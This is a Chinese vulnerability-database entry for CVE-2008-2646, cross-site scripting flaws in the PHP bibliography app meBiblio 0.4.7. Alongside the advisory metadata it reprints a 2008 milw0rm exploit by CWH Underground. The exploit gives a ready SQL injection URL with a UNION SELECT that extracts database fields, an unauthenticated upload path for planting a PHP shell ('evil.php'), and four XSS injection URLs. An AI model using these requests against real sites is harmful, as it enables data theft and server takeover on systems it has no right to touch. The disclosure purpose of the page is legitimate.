meBiblio 多个跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115324 漏洞类型 跨站脚本
发布时间 2008-06-01 更新时间 2009-04-14
CVE编号 CVE-2008-2646 CNNVD-ID CNNVD-200806-151
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/5716
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-151
|漏洞详情
meBiblio0.4.7版本存在多个跨站脚本漏洞。远程攻击者可以借助(1)到dbadd.inc.php的sql参数,(2)到add_journal_mask.inc.php的InsertJournal参数,(3)到insert_mask.inc.php的InsertBibliography参数以及(4)到search_mask.inc.php的LabelYear参数,注入任意的web脚本或HTML。
|漏洞EXP
========================================================================================
 meBiblio 0.4.7 Remote SQL Injection/ Arbitrary File Upload Exploit / XSS Vulnerability
========================================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 1 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : meBiblio
 VERSION     : 0.4.7 (Lastest Version)
 VENDOR      : http://mebiblio.sourceforge.net/ 
 DOWNLOAD    : http://downloads.sourceforge.net/mebiblio
#####################################################

---SQL Injection Exploit---

http://[target]/[path]/admin/journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2

** You will found PACS_description in Journal Long Name's Box **


---Arbitrary File Upload Exploit---

[Files Directory must existed]

Upload Path: http://[target]/[path]/upload/uploader.html

Shell Script: http://[target]/[path]/files/evil.php


---Multiple Remote XSS Exploit---

[+]dbadd.inc.php
[+]add_journal_mask.inc.php
[+]insert_mask.inc.php
[+]search_mask.inc.php

Example:
     
http://[target]/[path]/dbadd.inc.php?sql=<XSS>
http://[target]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://[target]/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://[target]/[path]/search_mask.inc.php?LabelYear=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-01]
|参考资料

来源:XF
名称:mebiblio-multiple-scripts-xss(42760)
链接:http://xforce.iss.net/xforce/xfdb/42760
来源:BID
名称:29465
链接:http://www.securityfocus.com/bid/29465
来源:MILW0RM
名称:5716
链接:http://www.milw0rm.com/exploits/5716
来源:SECUNIA
名称:30488
链接:http://secunia.com/advisories/30488